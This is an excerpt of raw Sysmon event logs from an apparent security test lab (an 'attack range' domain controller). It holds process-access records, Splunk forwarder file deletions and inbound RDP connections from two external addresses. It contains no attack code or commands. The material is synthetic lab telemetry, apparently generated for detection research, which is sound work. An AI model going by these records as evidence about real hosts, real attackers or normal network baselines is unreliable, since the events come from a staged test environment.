10341000x800000000000000099576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.678{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D39D09D6EEB3EC3A67F544E77A72D6E8,SHA256=28EA65471F48D17011AFBDBA8B22DEB4509730B29287342434B43CD98D6D1E17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.771{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C8A82B711EBF1E3D03D0F05AA68F588,SHA256=22D1A706357EB8636C9EAAC7FF86C1A0BF061914CF71BFCB499087273669E229,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.724{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F67B77B3F79B4F0D16AC798789EF3ED8,SHA256=13DD50B6BFB17EA237EA6A6B93484F9DF2620FEBABCE10D2C53BB633B6DFC95A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.771{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC1201B19DE883D59A0A506DB0A6149,SHA256=F3BA2249FAA95743B02E2560BC9A471C11D8EB241EFD8A1F4069DA6361507A75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:53.804{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-35102-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:53.172{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-34086-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.994{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33776-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.865{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C5612A45EBBD592BFDD806E03BFEC3,SHA256=81FEE535210FDD4018C0C67B49A4356DF3051E158E7EFA6872283CAC80AE612E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.080{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-35526-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:53.882{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-35214-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.959{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77678612AA80AE6C9411193B056050B9,SHA256=9A94717EF816D26481343D69D043A5805E431DB8C6A2D151B2603FD38E6B536E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.919{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-38606-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.911{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51466-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.712{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 